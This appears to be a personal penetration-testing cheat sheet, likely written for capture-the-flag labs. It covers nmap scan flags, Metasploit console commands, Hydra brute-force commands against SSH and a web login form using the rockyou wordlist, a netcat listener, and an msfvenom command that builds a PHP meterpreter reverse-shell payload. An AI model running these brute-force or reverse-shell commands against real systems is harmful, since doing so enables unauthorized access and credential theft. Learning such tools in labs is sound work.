
Commands that might be useful and why they might be useful. In general, I like to add | tee name.log after the commands so that I have a record of what was found and don’t have to run things multiple times. Assume that is after every command.


Map out ports. See NMAP Basic and NMAP Advanced for more.

    # vulnerability mapping
    nmap -sV -sC -script vuln blue.nmap XX.XX.XXX.XXX
    -h          # help
    -sS         # Secret scan
    -sU         # UDP scan
    -O          # Find operatin system
    -sV         # scan version
    -v          # Verbose
    -vv         # Double verbose
    -oX         # XML output
    -A          # Aggressive scan
    -T5         # Max timeout (insane mode)
    -p XX       # Specify port XX
    -F          # Fast scan (most common only)
    -p-         # Scan all ports
    --script    # Run scripts
    -Pn         # Run without pinging


Start metasploit with msfconsole. See Metasploit for more

Console commands:

    db_status       # database status
    help            # help commands
    ?               # help shortcut
    search          # find stuff
    use             # Actually use the module
    info            # Show info about module
    show options    # Shows options for module
    set [A] [B]     # Sets A to B. Use "show options" to see "A" options
    get [A]         # Shows value of "A". "Show options" shows all
    unset [A]       # Sets B to null
    spool           # Save output to file
    save            # Saves settings to file and can open later

Deduplicate values

This is just a matter of sorting, finding unique and saving but can be EXTREMELY useful when trying to bruteforce with a list that has duplicates.

sort input_file.txt | uniq > output_file.txt

Using Hydra

See Hydra for more

# ssh attack
hydra -l molly -P /usr/share/wordlists/rockyou.txt $ipadd -t 4 ssh
# login attack
hydra -l molly -P /usr/share/wordlists/rockyou.txt http-post-form "/login:username=^USER^&password=^PASS^:Your username or password is incorrect." -V -t 4


Use netcat to read from a port when using a reverse shell.

    nc -lvp 4444


This creates a reverse shell that goes back to the target machine. Using the command

    msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=4444 -f raw -o payload.php